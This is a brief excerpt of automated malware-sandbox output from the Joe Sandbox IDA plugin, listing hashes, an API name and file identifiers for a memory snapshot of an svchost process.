• Source File: 00000044.00000002.3310062832.000001CA97FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA97FD0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_68_2_1ca97fd0000_svchost.jbxd
Similarity
• API ID: __std_exception_copy
• String ID: Locator'$riptor at (
• API String ID: 592178966-4215709766
• Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
• Instruction ID: 5ec6e1aa0c21c2a9d54db6f90e025f6508c94ea03da05262c35edcb0eb738dc6
• Instruction Fuzzy Hash: 08E08671650B4880EF038F65E8415D877A0EF58B5CBC89122C95D57311EB3CD1E5C311